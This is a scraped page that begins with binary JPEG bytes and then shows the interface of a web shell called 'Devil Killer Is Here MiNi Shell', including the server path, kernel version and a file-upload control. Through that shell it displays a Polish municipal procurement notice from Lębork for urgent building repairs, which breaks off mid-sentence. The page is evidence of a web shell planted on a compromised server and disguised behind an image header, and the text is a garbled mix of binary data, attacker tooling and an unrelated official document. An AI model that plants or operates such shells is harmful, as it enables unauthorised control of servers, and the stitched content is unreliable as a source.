JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230629/0028255601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie pilnych robót budowlanych branży ogólnobudowlanej, dekarskiej, elektrycznej i instalacyjnej w budynkach i lokalach stanowiących własność Gminy Miasto Lębork w 2023/24 roku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Lębork</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979737</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Armii Krajowej 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lębork</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk@um.lebork.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lebork.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie pilnych robót budowlanych branży ogólnobudowlanej, dekarskiej, elektrycznej i instalacyjnej w budynkach i lokalach stanowiących własność Gminy Miasto Lębork w 2023/24 roku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-04c21990-1678-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00282556</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00057709/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Wykonanie pilnych robót budowlanych branży ogólnobudowlanej , dekarskiej, elektrycznej i instalacyjnej w budynkach i lokalach stanowiących własność Gminy Miasto Lębork</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lebork <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lebork</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">opisane szczegółowo w dziale III, rozdziale 1 SWZ:<br/>1. SPOSÓB POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMI<br/>1) Wszelka korespondencja związaną z przedmiotowym postępowaniem, w tym złożenie<br/>oferty, następuje wyłącznie przy użyciu Platformy zakupowej:<br/>https://platformazakupowa.pl/pn/lebork . Zaleca się komunikację za pośrednictwem<br/>https://platformazakupowa.pl/pn/lebork poprzez kliknięcie przycisku „Wyślij<br/>wiadomość do Zamawiającego”, po którym pojawi się komunikat, że wiadomość<br/>została wysłana do Zamawiającego.<br/>2) Informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i<br/>odbierania korespondencji elektronicznej:<br/>a) wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z<br/>Platformy zakupowej na stronie: https://platformazakupowa.pl/strona/1-<br/>regulamin<br/>b) korzystanie z Platformy zakupowej jest bezpłatne.<br/>3) We wszelkiej korespondencji związanej z przedmiotowym postępowaniem<br/>Zamawiający i Wykonawcy posługują się numerem postępowania wskazanym w SWZ<br/>lub numerem ogłoszenia opublikowanego w Biuletynie Zamówień Publicznych.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku<br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych ) (Dz. Urz. UE L 119 z 04.05.2016 r., str. 1), zwane dalej „RODO”, Zamawiający<br/>informuje, że:<br/>a) administratorem danych osobowych jest Urząd Miejski w Lęborku, ul. Armii<br/>Krajowej 14, 84-300 Lębork, tel. 059 862 42 80;<br/>b) inspektorem ochrony danych osobowych w Urzędzie Miejskim w Lęborku jest<br/>p. Bożena Steciuk, e-mail: iod@um.lebork.pl, tel. ; 059 863 77 33;<br/>c) dane osobowe przekazane przez Wykonawcę przetwarzane będą na podstawie<br/>art. 6 ust. 1 lit c RODO w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego pn.: „Wykonanie pilnych robót budowlanych branży<br/>ogólnobudowlanej, dekarskiej, elektrycznej i instalacyjnej w budynkach i lokalach<br/>stanowiących własność Gminy Miasto Lębork w 2023/24 roku”<br/>ZK.271.24.2023.ŁS .<br/>d) odbiorcami danych osobowych przekazanych przez Wykonawcę będą osoby lub<br/>podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu<br/>o art. 18, art. 74 oraz art. 75 Ustawy Pzp.<br/>e) dane osobowe przekazane przez Wykonawcę będą przechowywane, zgodnie<br/>z art. 78 Ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania<br/>o udzielenie zamówienia;<br/>f) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio<br/>dotyczących Wykonawcy jest wymogiem ustawowym określonym w przepisach<br/>Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego, konsekwencje niepodania określonych danych wynikają z Ustawy<br/>Pzp;<br/>g) w odniesieniu do danych osobowych przekazanych przez Wykonawcę decyzje nie<br/>będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>h) Wykonawca posiada:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>dotyczących Wykonawcy;<br/> na podstawie art. 16 RODO prawo do sprostowania danych osobowych<br/>Wykonawcy;<br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO;<br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych,<br/>gdy Wykonawca uzna, że przetwarzanie danych osobowych dotyczących<br/>Wykonawcy narusza przepisy RODO;<br/>i) Wykonawcy nie przysługuje:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych<br/>Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZK.271.24.2023.ŁS</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiot zamówienia stanowi wykonanie pilnych robót budowlanych branży ogólnobudowlanej, dekarskiej, elektrycznej i instalacyjnej w budynkach i lokalach stanowiących własność Gminy Miasto Lębork w 2023/24 roku. <br/>W chwili obecnej w zasobach komunalnych znajduje się 1147 mieszkań komunalnych usytuowanych zarówno w budynkach Wspólnot Mieszkaniowych jak i w 71 budynkach mieszkalnych będących własnością Gminy Miasto Lębork. <br/>2) Wspólny Słownik Zamówień: <br/>45210000-2 – Roboty budowlane w zakresie budynków<br/>45300000-0 – Roboty instalacyjne w budynkach<br/>45261900-3 – Naprawa i konserwacja dachów<br/>3) Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji i odbioru określają:<br/>specyfikacja techniczna wykonania i odbioru robót budowlanych - załącznik nr 1 do SWZ stanowiący jednocześnie załącznik do projektu umowy,<br/>projekt umowy – załącznik nr 2 do SWZ.<br/>Wszystkie wymagania określone w dokumentach wskazanych powyżej stanowią wymagania minimalne, a ich spełnienie jest obligatoryjne. Niespełnienie ww. wymagań minimalnych będzie skutkować odrzuceniem oferty jako niezgodnej<br/>z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261900-3 - Naprawa i konserwacja dachów</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp, w okresie 3 lat<br/>od dnia udzielenia zamówienia podstawowego, udzielenie dotychczasowemu Wykonawcy,<br/>zamówienia polegającego na powtórzeniu podobnych robót budowlanych, stanowiących<br/>nie więcej niż 70% wartości zamówienia podstawowego.<br/>Zamówienie to zostało przewidziane w ogłoszeniu o zamówieniu<br/>podstawowym, jest zgodne z jego przedmiotem oraz jego wartość została uwzględniona<br/>przy obliczaniu wartości zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena kryteriów: cena oraz okres gwarancji</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) O udzielenie zamówienia może ubiegać się Wykonawca, który spełnia łącznie<br/>następujące warunki:<br/>• nie podlega wykluczeniu na podstawie art. 108 ust. 1 Pzp, z uwzględnieniem<br/>postanowień art. 110 Pzp,<br/>• spełnia warunki, o których mowa w art. 112 ust. 2 Pzp, określone w pkt 2.<br/>2) Warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 Pzp dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu.<br/>Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie<br/>treści złożonego oświadczenia - załącznika nr 4 do SWZ wg formuły spełnia – nie<br/>spełnia.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie ustala szczegółowego warunku udziału w postępowaniu.<br/>Ocena spełnienia warunku udziału w postępowaniu będzie dokonana na podstawie<br/>treści złożonego oświadczenia - załącznika nr 4 do SWZ wg formuły spełnia – nie<br/>spełnia.<br/>c) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający wymaga, aby Wykonawca posiadał odpowiednie ubezpieczenie od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z<br/>przedmiotem zamówienia na kwotę co najmniej 500.000,00 zł.<br/>Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie<br/>treści złożonego dokumentu potwierdzającego wymagane ubezpieczenie oraz treści<br/>złożonego oświadczenia - załącznika nr 4 do SWZ wg formuły spełnia - nie spełnia.<br/>d) zdolności technicznej lub zawodowej:<br/>Zamawiający wymaga, aby Wykonawca wykazał, iż dysponuje co najmniej<br/>czterema osobami zatrudnionymi na podstawie umowy o pracę, które będą<br/>wykonywać czynności bezpośrednio związane z realizacją przedmiotowych prac<br/>budowlanych, w tym co najmniej jedna z wyżej wymienionych osób musi posiadać<br/>świadectwa kwalifikacyjne wydawane przez komisje powołane przez Prezesa<br/>Urzędu Regulacji Energetyki uprawniające do zajmowania się eksploatacją<br/>urządzeń, instalacji i sieci na stanowisku eksploatacji i dozoru w zakresie:<br/>Grupa 1. Obsługa, konserwacja, montaż urządzeń, instalacji i sieci<br/>elektroenergetycznych wytwarzających, przetwarzających, przesyłających i<br/>zużywających energię elektryczną:<br/>2. urządzenia i instalacje elektroenergetyczne o napięciu nie wyższym niż 1kV,<br/>10. aparatura kontrolno-pomiarowa oraz urządzenia i instalacje automatycznej<br/>regulacji, sterowania i zabezpieczeń urządzeń i instalacji wymienionych w pkt 2,<br/>Grupa 3. Obsługa, konserwacja, remont, montaż, kontrola-pomiar urządzeń,<br/>instalacji i sieci gazowych wytwarzających, przetwarzających, przesyłających,<br/>magazynujących i zużywających paliwa gazowe:<br/>6. urządzenia i instalacje gazowe o ciśnieniu nie wyższym niż 5 kPa,<br/>7. urządzenia i instalacje gazowe o ciśnieniu powyżej niż 5 kPa,<br/>10. aparatura kontrolno-pomiarowa, urządzenia sterowania do sieci, urządzeń<br/>i instalacji wymienionych w pkt 6 i 7.<br/>Ocena spełniania warunku udziału w postępowaniu będzie dokonana na podstawie<br/>treści złożonego dokumentu - Załącznika nr 4 do SWZ tj. wykazu osób zatrudnionych<br/>przez Wykonawcę oraz treści złożonego oświadczenia - załącznika nr 4 do SWZ<br/>wg formuły spełnia - nie spełnia<br/>3) Zamawiający może, oceniając zdolność techniczną lub zawodową, na każdym etapie<br/>postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie<br/>zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia<br/>gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia na<br/>każdym etapie postępowania (art. 116 ust. 2 ustawy Pzp).<br/>4) Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów musi<br/>udowodnić Zamawiającemu, że realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zgodnie<br/>z art. 118 ust. 3 i 4 Pzp zobowiązanie tych podmiotów do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia.<br/>5) Zamawiający oceni zgodnie z art. 119 Pzp, czy udostępniane Wykonawcy przez inne<br/>podmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa<br/>i ekonomiczna pozwalają na wykazanie przez Wykonawcę spełniania warunków<br/>udziału w postępowaniu, o których mowa w podrozdziale 6 SWZ oraz zbada czy nie<br/>zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w<br/>podrozdziale 7 SWZ.<br/>6) Sposób wykazania warunków udziału w postępowaniu wskazano w podrozdziale 8<br/>SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">opisane w dziale II rozdział 8 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">opisane w dziale II rozdział 8 SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od wykonawców przedłożenia przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca przystępujący do postępowania jest zobowiązany do wniesienia wadium<br/>w kwocie: 28.000 zł (słownie: dwadzieścia osiem tysięcy złotych 00/100) przed<br/>upływem terminu składania ofert, wskazanym w SWZ dział III, rozdział 2.<br/>2) Wniesione wadium musi zabezpieczać cały okres związania ofertą.<br/>3) Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7<br/>ustawy Pzp.<br/>4) Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego w Banku Pekao SA, numer rachunku 21 1240 1268 1111 0010 8729<br/>0508 . Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego<br/>najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na<br/>rachunek bankowy Zamawiającego).<br/>5) W przypadku wnoszenia wadium w formie pieniężnej za termin jego wniesienia<br/>zostanie przyjęty termin uznania rachunku Zamawiającego, o którym mowa w pkt. 4<br/>przed terminem składania ofert ( tj. przed upływem dnia i godziny wyznaczonej jako<br/>ostateczny termin składania ofert). Oferta Wykonawcy, który nie wniesie wadium w<br/>wymaganym terminie zostanie odrzucona.<br/>6) Zamawiający nie dopuszcza złożenia wadium w walucie innej niż złoty polski (PLN)<br/>i dotyczy to wadium składanego w każdej z możliwych form.<br/>7) Wadium wnoszone w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>8) Jeżeli wadium jest wnoszone w innej formie niż pieniądz, tj. w w poręczeniach lub<br/>gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez<br/>wystawcę dokumentu.<br/>9) Wadium wniesione w formie poręczenia lub gwarancji bankowej, gwarancji<br/>ubezpieczeniowej musi obejmować odpowiedzialność za wszystkie przypadki<br/>powodujące utratę wadium przez wykonawcę określone w art. 98 ust. 6 ustawy Pzp.<br/>10)Wadium wniesione w formie poręczenia lub gwarancji bankowej, gwarancji<br/>ubezpieczeniowej musi posiadać zapis, że w przypadku zatrzymania wadium przez<br/>Zamawiającego, gwarant podejmie się bezwarunkowo i nieodwołalnie wypłacenia<br/>Zamawiającemu wyżej wymienionej wysokości kwoty, płatnej po pierwszym<br/>otrzymaniu pisemnego żądania bez konieczności jego uzasadnienia.<br/>11)W przypadku składania przez Wykonawcę wadium w formie poręczenia lub gwarancji<br/>bankowej, gwarancji ubezpieczeniowej, poręczenie/gwarancja musi być sporządzone<br/>zgodnie z obowiązującym prawem i musi zawierać następujące elementy:<br/>a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego),<br/>gwaranta/poręczyciela oraz 